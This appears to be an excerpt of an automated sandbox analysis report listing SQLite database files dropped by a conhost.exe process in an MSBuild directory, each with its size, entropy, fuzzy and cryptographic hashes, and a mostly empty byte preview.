                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
